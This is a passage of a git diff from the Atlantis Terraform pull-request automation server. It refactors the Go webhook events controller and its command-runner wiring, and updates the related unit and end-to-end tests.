PullRequest: &Pull, +} + var Pull = github.PullRequest{ Head: &github.PullRequestBranch{ SHA: github.String("sha256"), diff --git a/server/events/vcs/vcs_test.go b/server/events/vcs/vcs_test.go new file mode 100644 index 0000000000..5333ff26fe --- /dev/null +++ b/server/events/vcs/vcs_test.go @@ -0,0 +1,19 @@ +package vcs_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/vcs" + . "github.com/runatlantis/atlantis/testing" +) + +func TestStatus_String(t *testing.T) { + cases := map[vcs.CommitStatus]string{ + vcs.Pending: "pending", + vcs.Success: "success", + vcs.Failed: "failed", + } + for k, v := range cases { + Equals(t, v, k.String()) + } +} diff --git a/server/events_controller.go b/server/events_controller.go index 3db62bd96e..f666e1e329 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -29,7 +29,7 @@ const githubHeader = "X-Github-Event" const gitlabHeader = "X-Gitlab-Event" // EventsController handles all webhook requests which signify 'events' in the -// VCS host, ex. GitHub. It's split out from Server to make testing easier. +// VCS host, ex. GitHub. type EventsController struct { CommandRunner events.CommandRunner PullCleaner events.PullCleaner @@ -51,11 +51,7 @@ type EventsController struct { // startup to support. SupportedVCSHosts []models.VCSHostType VCSClient vcs.ClientProxy - // AtlantisGithubUser is the user that atlantis is running as for Github. - AtlantisGithubUser models.User - // AtlantisGitlabUser is the user that atlantis is running as for Gitlab. - AtlantisGitlabUser models.User - TestingMode bool + TestingMode bool } // Post handles POST webhook requests. @@ -117,27 +113,20 @@ func (e *EventsController) HandleGithubCommentEvent(w http.ResponseWriter, event return } - // We pass in an empty models.Repo for headRepo because we need to do additional - // calls to get that information but we need this code path to be generic. 
- // Later on in CommandHandler we detect that this is a GitHub event and - // make the necessary calls to get the headRepo. - e.handleCommentEvent(w, baseRepo, models.Repo{}, user, pullNum, event.Comment.GetBody(), models.Github) + // We pass in nil for maybeHeadRepo because the head repo data isn't + // available in the GithubIssueComment event. + e.handleCommentEvent(w, baseRepo, nil, user, pullNum, event.Comment.GetBody(), models.Github) } // HandleGithubPullRequestEvent will delete any locks associated with the pull // request if the event is a pull request closed event. It's exported to make // testing easier. func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, pullEvent *github.PullRequestEvent, githubReqID string) { - pull, headRepo, err := e.Parser.ParseGithubPull(pullEvent.PullRequest) + pull, baseRepo, headRepo, user, err := e.Parser.ParseGithubPullEvent(pullEvent) if err != nil { e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing pull data: %s %s", err, githubReqID) return } - baseRepo, err := e.Parser.ParseGithubRepo(pullEvent.Repo) - if err != nil { - e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing repo data: %s %s", err, githubReqID) - return - } var eventType string switch pullEvent.GetAction() { case "opened": @@ -150,7 +139,7 @@ func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, p eventType = OtherPullEvent } e.Logger.Info("identified event as type %q", eventType) - e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGithubUser, eventType) + e.handlePullRequestEvent(w, baseRepo, headRepo, pull, user, eventType) } const OpenPullEvent = "opened" @@ -179,16 +168,13 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep // We use a goroutine so that this function returns and the connection is // closed. 
fmt.Fprintln(w, "Processing...") - // We use a Command to represent autoplanning but we set dir and - // workspace to '*' to indicate that all applicable dirs and workspaces - // should be planned. - autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", "", true) - e.Logger.Info("executing command %s", autoplanCmd) + + e.Logger.Info("executing autoplan") if !e.TestingMode { - go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) + go e.CommandRunner.RunAutoplanCommand(baseRepo, headRepo, pull, user) } else { // When testing we want to wait for everything to complete. - e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) + e.CommandRunner.RunAutoplanCommand(baseRepo, headRepo, pull, user) } return case ClosedPullEvent: @@ -202,7 +188,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep return case OtherPullEvent: // Else we ignore the event. - e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event") + e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-actionable pull request event") return } } @@ -236,10 +222,10 @@ func (e *EventsController) HandleGitlabCommentEvent(w http.ResponseWriter, event e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err) return } - e.handleCommentEvent(w, baseRepo, headRepo, user, event.MergeRequest.IID, event.ObjectAttributes.Note, models.Gitlab) + e.handleCommentEvent(w, baseRepo, &headRepo, user, event.MergeRequest.IID, event.ObjectAttributes.Note, models.Gitlab) } -func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, comment string, vcsHost models.VCSHostType) { +func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, comment string, vcsHost models.VCSHostType) { parseResult := 
e.CommentParser.Parse(comment, vcsHost) if parseResult.Ignore { truncated := comment @@ -278,10 +264,10 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // Respond with success and then actually execute the command asynchronously. // We use a goroutine so that this function returns and the connection is // closed. - go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command) + go e.CommandRunner.RunCommentCommand(baseRepo, maybeHeadRepo, user, pullNum, parseResult.Command) } else { // When testing we want to wait for everything to complete. - e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command) + e.CommandRunner.RunCommentCommand(baseRepo, maybeHeadRepo, user, pullNum, parseResult.Command) } } @@ -289,7 +275,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // request if the event is a merge request closed event. It's exported to make // testing easier. func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, event gitlab.MergeEvent) { - pull, baseRepo, headRepo, err := e.Parser.ParseGitlabMergeEvent(event) + pull, baseRepo, headRepo, user, err := e.Parser.ParseGitlabMergeEvent(event) if err != nil { e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err) return @@ -306,7 +292,7 @@ func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, eventType = OtherPullEvent } e.Logger.Info("identified event as type %q", eventType) - e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGitlabUser, eventType) + e.handlePullRequestEvent(w, baseRepo, headRepo, pull, user, eventType) } // supportsHost returns true if h is in e.SupportedVCSHosts and false otherwise. 
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 7d9f300a72..5abb66ad37 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -164,7 +164,7 @@ func TestGitHubWorkflow(t *testing.T) { When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil) // First, send the open pull request event and trigger an autoplan. - pullOpenedReq := GitHubPullRequestOpenedEvent(t) + pullOpenedReq := GitHubPullRequestOpenedEvent(t, headSHA) ctrl.Post(w, pullOpenedReq) responseContains(t, w, 200, "Processing...") if c.ExpAutoplanCommentFile != "" { @@ -236,51 +236,51 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, } defaultTFVersion := terraformClient.Version() - commandHandler := &events.CommandHandler{ + locker := events.NewDefaultAtlantisWorkspaceLocker() + commandRunner := &events.DefaultCommandRunner{ + ProjectCommandRunner: &events.ProjectCommandRunner{ + Locker: projectLocker, + LockURLGenerator: &mockLockURLGenerator{}, + InitStepRunner: runtime.InitStepRunner{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTFVersion, + }, + PlanStepRunner: runtime.PlanStepRunner{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTFVersion, + }, + ApplyStepRunner: runtime.ApplyStepRunner{ + TerraformExecutor: terraformClient, + }, + RunStepRunner: runtime.RunStepRunner{}, + PullApprovedChecker: runtime.PullApprovedChecker{ + VCSClient: e2eVCSClient, + }, + Workspace: atlantisWorkspace, + Webhooks: &mockWebhookSender{}, + AtlantisWorkspaceLocker: locker, + }, EventParser: eventParser, VCSClient: e2eVCSClient, GithubPullGetter: e2eGithubGetter, GitlabMergeRequestGetter: e2eGitlabGetter, CommitStatusUpdater: e2eStatusUpdater, - AtlantisWorkspaceLocker: events.NewDefaultAtlantisWorkspaceLocker(), MarkdownRenderer: &events.MarkdownRenderer{}, Logger: logger, AllowForkPRs: allowForkPRs, 
AllowForkPRsFlag: "allow-fork-prs", - PullRequestOperator: &events.DefaultPullRequestOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTFVersion, - ParserValidator: &yaml.ParserValidator{}, - ProjectFinder: &events.DefaultProjectFinder{}, - VCSClient: e2eVCSClient, - Workspace: atlantisWorkspace, - ProjectOperator: events.ProjectOperator{ - Locker: projectLocker, - LockURLGenerator: &mockLockURLGenerator{}, - InitStepOperator: runtime.InitStepOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTFVersion, - }, - PlanStepOperator: runtime.PlanStepOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTFVersion, - }, - ApplyStepOperator: runtime.ApplyStepOperator{ - TerraformExecutor: terraformClient, - }, - RunStepOperator: runtime.RunStepOperator{}, - ApprovalOperator: runtime.ApprovalOperator{ - VCSClient: e2eVCSClient, - }, - Workspace: atlantisWorkspace, - Webhooks: &mockWebhookSender{}, - }, + ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{ + ParserValidator: &yaml.ParserValidator{}, + ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: e2eVCSClient, + Workspace: atlantisWorkspace, + AtlantisWorkspaceLocker: locker, }, } ctrl := server.EventsController{ TestingMode: true, - CommandRunner: commandHandler, + CommandRunner: commandRunner, PullCleaner: &events.PullClosedExecutor{ Locker: lockingClient, VCSClient: e2eVCSClient, @@ -298,12 +298,6 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, }, SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github}, VCSClient: e2eVCSClient, - AtlantisGithubUser: models.User{ - Username: "atlantisbot", - }, - AtlantisGitlabUser: models.User{ - Username: "atlantisbot", - }, } return ctrl, e2eVCSClient, e2eGithubGetter, atlantisWorkspace } @@ -331,10 +325,12 @@ func GitHubCommentEvent(t *testing.T, comment string) *http.Request { return req } -func GitHubPullRequestOpenedEvent(t *testing.T) 
*http.Request { +func GitHubPullRequestOpenedEvent(t *testing.T, headSHA string) *http.Request { requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestOpenedEvent.json")) Ok(t, err) - req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON)) + // Replace sha with expected sha. + requestJSONStr := strings.Replace(string(requestJSON), "c31fd9ea6f557ad2ea659944c3844a059b83bc5d", headSHA, -1) + req, err := http.NewRequest("POST", "/events", bytes.NewBuffer([]byte(requestJSONStr))) Ok(t, err) req.Header.Set("Content-Type", "application/json") req.Header.Set(githubHeader, "pull_request") @@ -357,7 +353,7 @@ func GitHubPullRequestParsed(headSHA string) *github.PullRequest { headSHA = "13940d121be73f656e2132c6d7b4c8e87878ac8d" } return &github.PullRequest{ - Number: github.Int(1), + Number: github.Int(2), State: github.String("open"), HTMLURL: github.String("htmlurl"), Head: &github.PullRequestBranch{ diff --git a/server/events_controller_test.go b/server/events_controller_test.go index a7f5c81a69..225021086f 100644 --- a/server/events_controller_test.go +++ b/server/events_controller_test.go @@ -16,6 +16,7 @@ package server_test import ( "bytes" "errors" + "fmt" "io/ioutil" "net/http" "net/http/httptest" @@ -267,9 +268,7 @@ func TestPost_GitlabCommentSuccess(t *testing.T) { e.Post(w, req) responseContains(t, w, http.StatusOK, "Processing...") - // wait for 200ms so goroutine is called - time.Sleep(200 * time.Millisecond) - cr.VerifyWasCalledOnce().ExecuteCommand(models.Repo{}, models.Repo{}, models.User{}, 0, nil) + cr.VerifyWasCalledOnce().RunCommentCommand(models.Repo{}, &models.Repo{}, models.User{}, 0, nil) } func TestPost_GithubCommentSuccess(t *testing.T) { @@ -281,16 +280,14 @@ func TestPost_GithubCommentSuccess(t *testing.T) { When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) baseRepo := models.Repo{} user := models.User{} - cmd := events.Command{} + cmd := events.CommentCommand{} 
When(p.ParseGithubIssueCommentEvent(matchers.AnyPtrToGithubIssueCommentEvent())).ThenReturn(baseRepo, user, 1, nil) When(cp.Parse("", models.Github)).ThenReturn(events.CommentParseResult{Command: &cmd}) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusOK, "Processing...") - // wait for 200ms so goroutine is called - time.Sleep(200 * time.Millisecond) - cr.VerifyWasCalledOnce().ExecuteCommand(baseRepo, baseRepo, user, 1, &cmd) + cr.VerifyWasCalledOnce().RunCommentCommand(baseRepo, nil, user, 1, &cmd) } func TestPost_GithubPullRequestInvalid(t *testing.T) { @@ -301,45 +298,87 @@ func TestPost_GithubPullRequestInvalid(t *testing.T) { event := `{"action": "closed"}` When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) - When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, errors.New("err")) + When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("err")) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusBadRequest, "Error parsing pull data: err") } -func TestPost_GithubPullRequestInvalidRepo(t *testing.T) { - t.Log("when the event is a github pull request with invalid repo data we return a 400") - e, v, _, p, _, _, _, _ := setup(t) +func TestPost_GitlabMergeRequestInvalid(t *testing.T) { + t.Log("when the event is a gitlab merge request with invalid data we return a 400") + e, _, gl, p, _, _, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) - req.Header.Set(githubHeader, "pull_request") - - event := `{"action": "closed"}` - When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) - When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, nil) - When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(models.Repo{}, errors.New("err")) + 
req.Header.Set(gitlabHeader, "value") + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + repo := models.Repo{} + pullRequest := models.PullRequest{State: models.Closed} + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, errors.New("err")) w := httptest.NewRecorder() e.Post(w, req) - responseContains(t, w, http.StatusBadRequest, "Error parsing repo data: err") + responseContains(t, w, http.StatusBadRequest, "Error parsing webhook: err") } func TestPost_GithubPullRequestNotWhitelisted(t *testing.T) { t.Log("when the event is a github pull request to a non-whitelisted repo we return a 400") - e, v, _, p, _, _, _, _ := setup(t) + e, v, _, _, _, _, _, _ := setup(t) e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"} req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(githubHeader, "pull_request") event := `{"action": "closed"}` When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) - When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, nil) - When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(models.Repo{}, nil) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo") } -func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) { - t.Log("when the event is a pull request and we have an error calling CleanUpPull we return a 503") +func TestPost_GitlabMergeRequestNotWhitelisted(t *testing.T) { + t.Log("when the event is a gitlab merge request to a non-whitelisted repo we return a 400") + e, _, gl, p, _, _, _, _ := setup(t) + req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) + req.Header.Set(gitlabHeader, "value") + + e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"} + When(gl.ParseAndValidate(req, 
secret)).ThenReturn(gitlabMergeEvent, nil) + repo := models.Repo{} + pullRequest := models.PullRequest{State: models.Closed} + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil) + + w := httptest.NewRecorder() + e.Post(w, req) + responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo") +} + +func TestPost_GithubPullRequestUnsupportedAction(t *testing.T) { + e, v, _, _, _, _, _, _ := setup(t) + req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) + req.Header.Set(githubHeader, "pull_request") + + event := `{"action": "unsupported"}` + When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) + w := httptest.NewRecorder() + e.Post(w, req) + responseContains(t, w, http.StatusOK, "Ignoring non-actionable pull request event") +} + +func TestPost_GitlabMergeRequestUnsupportedAction(t *testing.T) { + t.Log("when the event is a gitlab merge request to a non-whitelisted repo we return a 400") + e, _, gl, p, _, _, _, _ := setup(t) + req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) + req.Header.Set(gitlabHeader, "value") + gitlabMergeEvent.ObjectAttributes.Action = "unsupported" + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + repo := models.Repo{} + pullRequest := models.PullRequest{State: models.Closed} + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil) + + w := httptest.NewRecorder() + e.Post(w, req) + responseContains(t, w, http.StatusOK, "Ignoring non-actionable pull request event") +} + +func TestPost_GithubPullRequestClosedErrCleaningPull(t *testing.T) { + t.Log("when the event is a closed pull request and we have an error calling CleanUpPull we return a 503") RegisterMockTestingT(t) e, v, _, p, _, c, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) @@ -349,30 +388,30 @@ func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) { 
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) repo := models.Repo{} pull := models.PullRequest{State: models.Closed} - When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(pull, repo, nil) - When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(repo, nil) + When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil) When(c.CleanUpPull(repo, pull)).ThenReturn(errors.New("cleanup err")) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusInternalServerError, "Error cleaning pull request: cleanup err") } -func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) { - t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 500") +func TestPost_GitlabMergeRequestClosedErrCleaningPull(t *testing.T) { + t.Log("when the event is a closed gitlab merge request and an error occurs calling CleanUpPull we return a 500") e, _, gl, p, _, c, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") + gitlabMergeEvent.ObjectAttributes.Action = "close" When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} - When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil) When(c.CleanUpPull(repo, pullRequest)).ThenReturn(errors.New("err")) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusInternalServerError, "Error cleaning pull request: err") } -func TestPost_GithubPullRequestSuccess(t *testing.T) { +func TestPost_GithubClosedPullRequestSuccess(t *testing.T) { t.Log("when the event is a pull request and everything works we return a 200") e, v, _, p, _, c, _, _ := setup(t) req, _ := 
http.NewRequest("GET", "", bytes.NewBuffer(nil)) @@ -382,8 +421,7 @@ func TestPost_GithubPullRequestSuccess(t *testing.T) { When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) repo := models.Repo{} pull := models.PullRequest{State: models.Closed} - When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(pull, repo, nil) - When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(repo, nil) + When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil) When(c.CleanUpPull(repo, pull)).ThenReturn(nil) w := httptest.NewRecorder() e.Post(w, req) @@ -398,12 +436,68 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) { When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} - When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusOK, "Pull request cleaned successfully") } +func TestPost_PullOpenedOrUpdated(t *testing.T) { + cases := []struct { + Description string + HostType models.VCSHostType + Action string + }{ + { + "github opened", + models.Github, + "opened", + }, + { + "gitlab opened", + models.Gitlab, + "open", + }, + { + "github synchronized", + models.Github, + "synchronize", + }, + { + "gitlab update", + models.Gitlab, + "update", + }, + } + + for _, c := range cases { + t.Run(c.Description, func(t *testing.T) { + e, v, gl, p, cr, _, _, _ := setup(t) + req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) + switch c.HostType { + case models.Gitlab: + req.Header.Set(gitlabHeader, "value") + gitlabMergeEvent.ObjectAttributes.Action = c.Action + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + repo := models.Repo{} + 
pullRequest := models.PullRequest{State: models.Closed} + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil) + case models.Github: + req.Header.Set(githubHeader, "pull_request") + event := fmt.Sprintf(`{"action": "%s"}`, c.Action) + When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) + repo := models.Repo{} + pull := models.PullRequest{State: models.Closed} + When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil) + } + w := httptest.NewRecorder() + e.Post(w, req) + responseContains(t, w, http.StatusOK, "Processing...") + cr.VerifyWasCalledOnce().RunAutoplanCommand(models.Repo{}, models.Repo{}, models.PullRequest{State: models.Closed}, models.User{}) + }) + } +} + func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParserValidator, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) { RegisterMockTestingT(t) v := mocks.NewMockGithubRequestValidator() @@ -414,6 +508,7 @@ func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValid c := emocks.NewMockPullCleaner() vcsmock := vcsmocks.NewMockClientProxy() e := server.EventsController{ + TestingMode: true, Logger: logging.NewNoopLogger(), GithubRequestValidator: v, Parser: p, diff --git a/server/router_test.go b/server/router_test.go new file mode 100644 index 0000000000..91bf9f3fc9 --- /dev/null +++ b/server/router_test.go @@ -0,0 +1,27 @@ +package server_test + +import ( + "net/http" + "testing" + + "github.com/gorilla/mux" + "github.com/runatlantis/atlantis/server" + . 
"github.com/runatlantis/atlantis/testing" +) + +func TestRouter_GenerateLockURL(t *testing.T) { + queryParam := "queryparam" + routeName := "routename" + atlantisURL := "https://example.com" + + underlyingRouter := mux.NewRouter() + underlyingRouter.HandleFunc("/lock", func(_ http.ResponseWriter, _ *http.Request) {}).Methods("GET").Queries(queryParam, "{queryparam}").Name(routeName) + + router := &server.Router{ + AtlantisURL: atlantisURL, + LockViewRouteIDQueryParam: queryParam, + LockViewRouteName: routeName, + Underlying: underlyingRouter, + } + Equals(t, "https://example.com/lock?queryparam=myid", router.GenerateLockURL("myid")) +} diff --git a/server/server.go b/server/server.go index fe97620d53..1980ba2521 100644 --- a/server/server.go +++ b/server/server.go @@ -63,7 +63,7 @@ type Server struct { AtlantisVersion string Router *mux.Router Port int - CommandHandler *events.CommandHandler + CommandRunner *events.DefaultCommandRunner Logger *logging.SimpleLogger Locker locking.Locker AtlantisURL string @@ -221,45 +221,43 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { GitlabToken: userConfig.GitlabToken, } defaultTfVersion := terraformClient.Version() - commandHandler := &events.CommandHandler{ - EventParser: eventParser, + commandRunner := &events.DefaultCommandRunner{ VCSClient: vcsClient, GithubPullGetter: githubClient, GitlabMergeRequestGetter: gitlabClient, CommitStatusUpdater: commitStatusUpdater, - AtlantisWorkspaceLocker: workspaceLocker, + EventParser: eventParser, MarkdownRenderer: markdownRenderer, Logger: logger, AllowForkPRs: userConfig.AllowForkPRs, AllowForkPRsFlag: config.AllowForkPRsFlag, - PullRequestOperator: &events.DefaultPullRequestOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTfVersion, - ParserValidator: &yaml.ParserValidator{}, - ProjectFinder: &events.DefaultProjectFinder{}, - VCSClient: vcsClient, - Workspace: workspace, - ProjectOperator: events.ProjectOperator{ - Locker: 
projectLocker, - LockURLGenerator: router, - InitStepOperator: runtime.InitStepOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTfVersion, - }, - PlanStepOperator: runtime.PlanStepOperator{ - TerraformExecutor: terraformClient, - DefaultTFVersion: defaultTfVersion, - }, - ApplyStepOperator: runtime.ApplyStepOperator{ - TerraformExecutor: terraformClient, - }, - RunStepOperator: runtime.RunStepOperator{}, - ApprovalOperator: runtime.ApprovalOperator{ - VCSClient: vcsClient, - }, - Workspace: workspace, - Webhooks: webhooksManager, + ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{ + ParserValidator: &yaml.ParserValidator{}, + ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: vcsClient, + Workspace: workspace, + }, + ProjectCommandRunner: &events.ProjectCommandRunner{ + Locker: projectLocker, + LockURLGenerator: router, + InitStepRunner: runtime.InitStepRunner{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTfVersion, + }, + PlanStepRunner: runtime.PlanStepRunner{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTfVersion, + }, + ApplyStepRunner: runtime.ApplyStepRunner{ + TerraformExecutor: terraformClient, + }, + RunStepRunner: runtime.RunStepRunner{}, + PullApprovedChecker: runtime.PullApprovedChecker{ + VCSClient: vcsClient, }, + Workspace: workspace, + Webhooks: webhooksManager, + AtlantisWorkspaceLocker: workspaceLocker, }, } repoWhitelist := &events.RepoWhitelistChecker{ @@ -273,7 +271,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { LockDetailTemplate: lockTemplate, } eventsController := &EventsController{ - CommandRunner: commandHandler, + CommandRunner: commandRunner, PullCleaner: pullClosedExecutor, Parser: eventParser, CommentParser: commentParser, @@ -285,14 +283,12 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { RepoWhitelistChecker: repoWhitelist, SupportedVCSHosts: supportedVCSHosts, VCSClient: vcsClient, - 
AtlantisGithubUser: models.User{Username: userConfig.GithubUser}, - AtlantisGitlabUser: models.User{Username: userConfig.GitlabUser}, } return &Server{ AtlantisVersion: config.AtlantisVersion, Router: underlyingRouter, Port: userConfig.Port, - CommandHandler: commandHandler, + CommandRunner: commandRunner, Logger: logger, Locker: lockingClient, AtlantisURL: userConfig.AtlantisURL, @@ -313,7 +309,8 @@ func (s *Server) Start() error { s.Router.PathPrefix("/static/").Handler(http.FileServer(&assetfs.AssetFS{Asset: static.Asset, AssetDir: static.AssetDir, AssetInfo: static.AssetInfo})) s.Router.HandleFunc("/events", s.EventsController.Post).Methods("POST") s.Router.HandleFunc("/locks", s.LocksController.DeleteLock).Methods("DELETE").Queries("id", "{id:.*}") - s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries(LockViewRouteIDQueryParam, "{id}").Name(LockViewRouteName) + s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET"). + Queries(LockViewRouteIDQueryParam, fmt.Sprintf("{%s}", LockViewRouteIDQueryParam)).Name(LockViewRouteName) n := negroni.New(&negroni.Recovery{ Logger: log.New(os.Stdout, "", log.LstdFlags), PrintStack: false, diff --git a/server/server_test.go b/server/server_test.go index 54776cfe9e..cec7a4fcb9 100644 --- a/server/server_test.go +++ b/server/server_test.go @@ -103,6 +103,7 @@ func TestIndex_Success(t *testing.T) { } func responseContains(t *testing.T, r *httptest.ResponseRecorder, status int, bodySubstr string) { + t.Helper() Equals(t, status, r.Result().StatusCode) body, _ := ioutil.ReadAll(r.Result().Body) Assert(t, strings.Contains(string(body), bodySubstr), "exp %q to be contained in %q", bodySubstr, string(body)) diff --git a/server/testfixtures/githubPullRequestClosedEvent.json b/server/testfixtures/githubPullRequestClosedEvent.json index 1fd568761e..cc281a8d7a 100644 --- a/server/testfixtures/githubPullRequestClosedEvent.json +++ b/server/testfixtures/githubPullRequestClosedEvent.json @@ -1,15 
